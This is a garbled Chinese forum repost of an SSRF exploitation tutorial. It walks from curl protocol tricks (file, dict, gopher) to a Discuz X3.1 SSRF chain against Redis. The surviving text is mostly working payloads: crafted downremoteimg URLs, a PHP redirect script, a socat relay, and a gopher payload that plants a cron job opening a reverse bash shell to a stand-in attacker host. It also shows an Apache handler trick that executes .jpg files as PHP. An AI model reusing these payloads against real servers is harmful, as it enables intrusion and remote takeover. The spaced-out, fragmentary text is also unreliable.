[26773] 2019-03-05_SSRF漏洞利用与getshell实战(精选)

文档创建者:s7ckTeam
浏览次数:14
最后更新:2025-01-19
2019-03-05_SSRF漏洞利用与getshell实战(精选) S S R F g e t s h e l l   w h o a m i   M s 0 8 0 6 7   2 0 1 9 - 0 3 - 0 5 S S R F S S R F S e r v e r - S i d e   R e q u e s t   F o r g e r y S S R F 访 E x a m p l e G E T   / i n d e x . p h p ? u r l = h t t p : / / g o o g l e . c o m /   H T T P / 1 . 1 H o s t :   e x a m p l e . c o m h t t p : / / e x a m p l e . c o m h t t p : / / g o o g l e . c o m 0 X 0 0   S S R F 0 X 0 1   S S R F 0 X 0 2   S S R F 0 X 0 3   S S R F C u r l 使 0 X 0 4   0 X 0 5   P y t h o n + S S R F 0 X 0 6   D i s c u z S S R F G e t S h e l l 0 X 0 7   S S R F 0 X 0 8   0 X 0 9   S S R F 0 X 0 0   S S R F 1 .   B a s i c 2 .   B l i n d 0 X 0 1   S S R F 1 .   ( ) 2 .   ( ) 3 .   ( u r l ) 4 .   ( : h t t p : / / w w w . x x x x . c o m / i m a g e ? u r l = h t t p : / / w w w . i m a g e . c o m / 1 . j p g ) 5 .   i p s s r f 0 X 0 2   S S R F 1 .   b a n n e r 2 .   3 .   W E B 访 R e a d m e 4 .   W E B G E T S t r u t s 2 S Q L 5 .   f i l e 6 .   R e d i s 访 H T T P   C R L F g e t s h e l l 7 .   w o o y u n p p t 8 .   9 .   c d n
0 X 0 3   S S R F C u r l 使 使 c u r l   # c u r l - - c o n f i g   p r o t o c o l s 使 c u r l c u r l   - v   f i l e : / / / e t c / p a s s w d 使 f t p c u r l   - v   " f t p : / / 1 2 7 . 0 . 0 . 1 : 6 6 6 6 / i n f o " 使 d i c t c u r l   - v   " d i c t : / / 1 2 7 . 0 . 0 . 1 : 6 6 6 6 / i n f o " 使 g o p h e r c u r l   - v   " g o p h e r : / / 1 2 7 . 0 . 0 . 1 : 6 6 6 6 / _ i n f o " 0 X 0 4 0 X 0 5   P y t h o n + S S R F W i r e s h a r k
P y t h o n 0 X 0 6   D i s c u z S S R F G e t S h e l l D i s c u z s s r f < = 3 . 1 1 7 2 . 2 8 . 1 0 0 . 1 0 9   D i s c u z   3 . 1 ( W i n 1 0 ) 1 7 2 . 2 8 . 1 0 0 . 1 0 8 R e d i s C e n t O S h a c k e r . x x x x . c o m s s r f p h p D i s c u z 3 . 1 h t t p : / / w w w . c o m s e n z . c o m / d o w n l o a d s / i n s t a l l / d i s c u z x # d o w n _ o p e n / f o r u m . p h p ? m o d = a j a x & a c t i o n = d o w n r e m o t e i m g & m e s s a g e = [ i m g ] h t t p : / / h a c k e r . x x x x . c o m / s s r f . p h p ? s = d i c t % 2 6 i p = 1 7 2 . 2 8 . 1 0 0 . 1 0 8 % 2 6 p o r t = 6 6 6 6 % 2 6 d a t a = h e l l o . j p g [ / i m g ] 使 p a y l o a d h t t p : / / 1 2 7 . 0 . 0 . 1 / D i s c u z _ X 3 . 1 / u p l o a d / f o r u m . p h p ? m o d = a j a x & a c t i o n = d o w n r e m o t e i m g & m e s s a g e = [ i m g ] h t t p : / / h a c k e r . x x x x . c o m / s s r f . p h p ? s = f t p % 2 6 i p = 1 7 2 . 2 8 . 1 0 0 . 1 0 8 % 2 6 p o r t = 6 6 6 6 % 2 6 d a t a = h e 2 l o . j p g [ / i m g ] n c S S R F h t t p : / / 1 2 7 . 0 . 0 . 1 / D i s c u z _ X 3 . 1 / u p l o a d / f o r u m . p h p ? m o d = a j a x & a c t i o n = d o w n r e m o t e i m g & m e s s a g e = [ i m g ] h t t p : / / 1 7 2 . 2 8 . 1 0 0 . 1 0 8 : 6 6 6 6 / ? d a t a = r o o t . j p g [ / i m g ]
t c p d u m p D i s c u z n c S S R F 使 h e a d e r   s s r f s s r f . p h p < ? p h p h e a d e r ( " L o c a t i o n :   f t p : / / 1 7 2 . 2 8 . 1 0 0 . 1 0 8 : 6 6 6 6 / i n f o " ) ; ? > 便 P A Y L O A D h t t p : / / 1 2 7 . 0 . 0 . 1 / D i s c u z _ X 3 . 1 / u p l o a d / f o r u m . p h p ? m o d = a j a x & a c t i o n = d o w n r e m o t e i m g & m e s s a g e = [ i m g ] h t t p : / / h a c k e r . x x x x . c o m / s s r f . p h p ? s = f t p % 2 6 i p = 1 7 2 . 2 8 . 1 0 0 . 1 0 8 % 2 6 p o r t = 6 6 6 6 % 2 6 d a t a = h e 2 l o . j p g [ / i m g ] n c f t p h t t p K A L I s o c a t - v s o c a t   - v   t c p - l i s t e n : 6 6 6 6 , f o r k   t c p - c o n n e c t : 1 7 2 . 2 8 . 1 0 0 . 1 0 8 : 6 3 7 9 S S R F     # c e n t o s u b u n t u c e n t o s / v a r / s p o o l / c r o n / r o o t u b u n t u / e t c / c r o n t a b         # r e d i s / v a r / s p o o l / c r o n r o o t * / 1   *   *   *   *   b a s h   - i   > & / d e v / t c p / h a c k e r . x x x x . c o m / 9 9 9 9   0 > & 1
s o c a t 1 . t x t 使 P y t h o n g o p h e r * / 1   *   *   *   *   b a s h   - i   > &   / d e v / t c p / h a c k e r . x x x . c o m / 9 9 9 9 0 > & 1 g o h p e r . p h p D i s c u z 访 g o h p e r . p h p 3 0 2 使 g o h p e r 访 r e d i s < ? p h p h e a d e r ( " L o c a t i o n :   g o p h e r : / / 1 7 2 . 2 8 . 1 0 0 . 1 0 8 : 6 3 7 9 / _ * 3 % 0 d % 0 a $ 3 % 0 d % 0 a s e t % 0 d % 0 a $ 1 % 0 d % 0 a 1 % 0 d % 0 a $ 6 2 % 0 d % 0 a % 0 a % 0 a % 0 a * / 1   *   *   *   *   b a s h   - i   > & / d e v / t c p / h a c k e r . x x x x . c o m / 9 9 9 9   0 > & 1 % 0 a % 0 a % 0 a % 0 a % 0 d % 0 a * 4 % 0 d % 0 a $ 6 % 0 d % 0 a c o n f i g % 0 d % 0 a $ 3 % 0 d % 0 a s e t % 0 d % 0 a $ 3 % 0 d % 0 a d i r % 0 d % 0 a $ 1 6 % 0 d % 0 a / v a r / s p o o l / c r o n / % 0 d % 0 a * 4 % 0 d % 0 a $ 6 % 0 d % 0 a c o n f i g % 0 d % 0 a $ 3 % 0 d % 0 a s e t % 0 d % 0 a $ 1 0 % 0 d % 0 a d b f i l e n a m e % 0 d % 0 a $ 4 % 0 d % 0 a r o o t % 0 d % 0 a * 1 % 0 d % 0 a $ 4 % 0 d % 0 a s a v e % 0 d % 0 a * 1 % 0 d % 0 a $ 4 % 0 d % 0 a q u i t % 0 d % 0 a % 0 a " ) ; ? > S S R F
使 W i r e s h a r k r e d i s R e d i s s h e l l 0 X 0 7   S S R F A p a c h e / e t c / a p a c h e 2 / s i t e s - e n a b l e d / a p a c h e 1 2 3 . c o n f A d d H a n d l e r   a p p l i c a t i o n / x - h t t p d - p h p   . p h p a p a c h e j p g p h p j p g s s r f t x t a p a c h e t x t p h p
1 . p h p . j p g 访 A d d H a n d l e r   a p p l i c a t i o n / x - h t t p d - p h p   . j p g 0 X 0 8   l i n u x v i m 使 S u b l i m e 0 X 0 9   S S R F F 1 2 G o o g l e H a c k i n g , s i t e : w w w . b a i d u . c o m u r l W H I T E M s 0 8 0 6 7

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则